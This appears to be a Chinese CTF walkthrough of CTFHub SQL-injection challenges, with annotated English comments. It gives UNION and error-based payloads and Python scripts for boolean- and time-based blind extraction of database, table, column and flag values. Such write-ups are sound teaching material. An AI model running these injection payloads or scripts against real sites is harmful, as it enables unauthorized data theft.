首先输入1,查看回显:
可以看到返回了SQL语句及ID和Data数据,查看列数:
1 order by 2 #
1111 union select 11,22 #
1111 union select version(),database() #
11111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
通过group_concat()函数将所有的表查询出来,得到news和flag两个表,继续查询flag表中的列:
11111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
查询到flag表中只有flag一列,查看flag列中的内容:
11111 union select 1,flag from sqli.flag #
首先尝试输入1,查看回显:
可以看到返回了SQL语句及ID和Data数据,因已得知为字符型注入,其注入过程及语句与整型注入一致:
11111' union select 1,flag from sqli.flag #
先输入1,查看回显:
当输入1'判断注入时,得到报错信息:
输入1 # 验证:
可以判断出为整型的报错注入,查询数据库名:
1 Union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
通过修改limit 0,1逐个查询表名:
查询出news和flag两个表,继续查询flag表中的列:
1 Union select count(*),concat((select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
1 Union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
先输入1,查看回显内容:
提示查询成功,但不会回显内容,只有查询语句语法错误时才显示error,尝试查询当前字段数:
1 order by 2 #
得出当前字段数为2,因为盲注需要猜解大量内容,使用脚本查询当前数据库名:
import requests
import string
# Challenge endpoint from the writeup; every payload below is appended
# directly to the ``id`` query parameter, i.e. it ends up inside the
# application's SQL text unescaped (the root cause of the vulnerability).
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
# Marker text the author observed in the page on a successful query (the
# prose above reports that the page shows nothing else and prints an error
# only on a syntax error); its presence/absence is the boolean oracle.
mark = 'query_success'
def database_name() -> None:
    """Recover the current database name one character at a time.

    Boolean-based blind oracle: each request asks whether character ``i`` of
    ``database()`` equals letter ``j``.  The TRUE branch of the injected
    ``if`` evaluates to ``1``; the FALSE branch is a multi-row subquery,
    which presumably makes the statement fail so the success marker does
    not appear in the response.  A letter is accepted as soon as ``mark``
    is found in the response body.

    Limits visible in the code: at most 8 positions are tried and only
    ``string.ascii_letters`` are candidates, so a position whose character
    is a digit or underscore is silently skipped (nothing is appended).

    Side effects: issues one GET per candidate against ``url``; prints the
    result.  Returns nothing.

    Defensive note: the oracle exists only because the raw ``id`` value is
    concatenated into SQL and the application exposes whether the query
    succeeded.  Binding ``id`` as a query parameter (or rejecting
    non-numeric ids) removes it entirely.
    """
    name = ''
    for i in range(1, 9):  # character positions 1..8 of database()
        for j in string.ascii_letters:
            # %d/%s are substituted into the SQL text before it is sent;
            # the whole string rides in the id query parameter.
            url_db = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            r = requests.get(url_db)
            if mark in r.text:  # marker present -> this letter matched
                name += j
                break  # first matching letter wins; next position
    print('database_name:', name)
database_name()  # runs at import/execution time: no ``__main__`` guard
import requests
import string
# Same challenge endpoint as the previous script; payloads are appended to
# the ``id`` parameter and land inside the SQL statement unescaped.
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
# Success marker in the response body; presence == injected condition true.
mark = 'query_success'
def table_name() -> None:
    """Recover up to four table names of the current schema, character by character.

    Same boolean oracle as ``database_name``: for table index ``i``
    (``limit i,1``), position ``j`` (1..8) and candidate letter ``k``, the
    injected ``if`` yields ``1`` on a match and a multi-row subquery
    otherwise; a match is detected by ``mark`` appearing in the response.

    Limits visible in the code: 4 tables x 8 characters, letters only.  An
    index with no table produces an empty string, and a name containing a
    digit or underscore is cut off at that character.

    Side effects: one GET per candidate; prints the collected names.
    Returns nothing.

    Note: the local ``list`` shadows the builtin of the same name (kept as
    the author wrote it).
    """
    list = []
    for i in range(0, 4):  # table index for ``limit i,1``
        name = ''
        for j in range(1, 9):  # character position within the name
            for k in string.ascii_letters:
                url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(url_t)
                if mark in r.text:  # matched: record the letter, next position
                    name += k
                    break
        list.append(name)
    print('table_name:', list)
table_name()  # runs at import/execution time: no ``__main__`` guard
得到两个表名:news和flag,继续查询flag表中的列:
import requests
import string
# Same challenge endpoint as above; payloads ride in the ``id`` parameter.
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
# Success marker in the response body; presence == injected condition true.
mark = 'query_success'
def columns_name() -> None:
    """Recover up to three column names of table ``flag`` in the current schema.

    Boolean oracle as in the previous scripts; the subquery is restricted
    to ``table_name="flag" and table_schema=database()`` and indexed with
    ``limit i,1``.  Positions 1..8 and letters only, so the same truncation
    caveat as ``table_name`` applies.

    Side effects: one GET per candidate; prints the collected names.
    Returns nothing.

    Note: the local ``list`` shadows the builtin of the same name.
    """
    list = []
    for i in range(0, 3):  # column index for ``limit i,1``
        name = ''
        for j in range(1, 9):  # character position within the name
            for k in string.ascii_letters:
                url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(url_c)
                if mark in r.text:  # matched: record the letter, next position
                    name += k
                    break
        list.append(name)
    print('column_name:', list)
columns_name()  # runs at import/execution time: no ``__main__`` guard
import requests
import string
# Same challenge endpoint as above; payloads ride in the ``id`` parameter.
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
# Success marker in the response body; presence == injected condition true.
mark = 'query_success'
def data() -> None:
    """Recover the value of ``flag.flag`` one character at a time.

    Position ``i`` runs 1..49; for each, candidate ASCII codes 48..125 are
    compared with ``ascii(substr(...,i,1))``.  A match (marker present in
    the response) appends ``chr(j)``; if no code in that range matches, the
    position is skipped and extraction continues with the next one.
    ``(select flag from flag)`` is used as a scalar subquery, so this
    assumes the table holds exactly one row — TODO confirm against the
    challenge.

    Side effects: one GET per candidate; prints the result.  Returns nothing.
    """
    name = ''
    for i in range(1, 50):  # character positions 1..49 of the value
        for j in range(48, 126):  # candidate byte values '0'..'}'
            url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (i, j)
            r = requests.get(url_d)
            if mark in r.text:  # matched: record the character, next position
                name += chr(j)
                break
    print('data:', name)
data()  # runs at import/execution time: no ``__main__`` guard
什么内容都不返回,尝试使用脚本进行时间盲注,首先获取数据库名:
import requests
import string
import time
# Endpoint of the second (time-based) challenge; payloads ride in the ``id``
# parameter.  No response marker is defined here: the scripts below decide
# purely on elapsed request time.
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def database_name() -> None:
    """Recover the database name via a time-based blind oracle.

    Each request injects ``if(substr(database(),i,1)="j",sleep(3),1)``; the
    wall-clock time around ``requests.get`` is measured and an elapsed time
    above 2 seconds is taken as "matched".  Nothing in the response body is
    inspected, which is why this variant is used when the page reflects no
    content at all.

    Caveats visible in the code: the 2 s threshold is fixed, so a slow
    network or a loaded server yields false positives and no retry or
    re-check is done; letters only, at most 8 positions.  ``r`` is assigned
    but never read.

    Side effects: one GET per candidate, each match costing about 3 s;
    prints the result.  Returns nothing.

    Defensive note: the delay is observable even though the page shows
    nothing, so "nothing is echoed" is not a mitigation.  Parameterizing
    the query closes the oracle; on the monitoring side the pattern is a
    burst of requests to one parameter of which a small fraction take
    almost exactly the injected ``sleep`` duration.
    """
    name = ''
    for i in range(1, 9):  # character positions 1..8 of database()
        for j in string.ascii_letters:
            url_db = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
            time_b = time.time()  # start of the timed window
            r = requests.get(url_db)
            time_f = time.time()  # end of the timed window
            if time_f-time_b > 2:  # sleep(3) fired -> letter matched
                name += j
                break
    print('database_name:', name)
database_name()  # runs at import/execution time: no ``__main__`` guard
import requests
import string
import time
# Endpoint of the time-based challenge; payloads ride in the ``id`` parameter.
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def table_name() -> None:
    """Recover up to two table names of the current schema via timing.

    Same structure as the boolean ``table_name`` script, but the TRUE branch
    of the injected ``if`` is ``sleep(3)`` and a match is an elapsed request
    time above 2 s.  Table index ``i`` goes through ``limit i,1``; positions
    1..8, letters only (a digit or underscore truncates the name).

    Side effects: one GET per candidate; prints the collected names.
    Returns nothing.

    Notes: the local ``list`` shadows the builtin; ``r`` is never read; the
    fixed threshold makes the result sensitive to network latency.
    """
    list = []
    for i in range(0, 2):  # table index for ``limit i,1``
        name = ''
        for j in range(1, 9):  # character position within the name
            for k in string.ascii_letters:
                url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
                time_b = time.time()
                r = requests.get(url_t)
                time_f = time.time()
                if time_f - time_b > 2:  # sleep(3) fired -> letter matched
                    name += k
                    break
        list.append(name)
    print('table_name:', list)
table_name()  # runs at import/execution time: no ``__main__`` guard
得到两个表名:news和flag,继续查询flag表中的列:
import requests
import string
import time
# Endpoint of the time-based challenge; payloads ride in the ``id`` parameter.
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def columns_name() -> None:
    """Recover the first column name of table ``flag`` via timing.

    ``range(0, 1)`` means only column index 0 is probed.  Unlike the
    boolean variant, the subquery filters on ``table_name="flag"`` alone
    (no ``table_schema`` restriction), so it would pick up a ``flag`` table
    from any schema the connection can see — presumably fine here, TODO
    confirm.  Match detection is an elapsed request time above 2 s.

    Side effects: one GET per candidate; prints the collected names.
    Returns nothing.  ``list`` shadows the builtin; ``r`` is never read.
    """
    list = []
    for i in range(0, 1):  # only the first column is probed
        name = ''
        for j in range(1, 9):  # character position within the name
            for k in string.ascii_letters:
                url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
                time_b = time.time()
                r = requests.get(url_c)
                time_f = time.time()
                if time_f - time_b > 2:  # sleep(3) fired -> letter matched
                    name += k
                    break
        list.append(name)
    print('column_name:', list)
columns_name()  # runs at import/execution time: no ``__main__`` guard
import requests
import string
import time
# Endpoint of the time-based challenge; payloads ride in the ``id`` parameter.
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def data() -> None:
    """Recover the value of ``flag.flag`` via timing, one character at a time.

    Positions 1..49; for each, ASCII codes 48..125 are compared with
    ``ascii(substr(...,i,1))`` and a match is an elapsed request time above
    2 s.  The partial value is printed after every matched character so
    progress is visible during the (slow) run.  As in the boolean variant,
    ``(select flag from flag)`` assumes a single-row table — TODO confirm.

    Side effects: GET requests; prints the partial and final result.
    Returns nothing.
    """
    name = ''
    for i in range(1, 50):  # character positions 1..49 of the value
        for j in range(48, 126):  # candidate byte values '0'..'}'
            url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
            # NOTE: the same request is sent here and again below; only the
            # second one is timed, so each candidate costs two round trips
            # (and leaves two identical entries in the server's access log).
            r = requests.get(url_d)
            time_b = time.time()
            r = requests.get(url_d)
            time_f = time.time()
            if time_f-time_b > 2:  # sleep(3) fired -> character matched
                name += chr(j)
                print(name)  # progress output: value recovered so far
                break
    print('data:', name)
data()  # runs at import/execution time: no ``__main__`` guard
得到flag:
完成时间盲注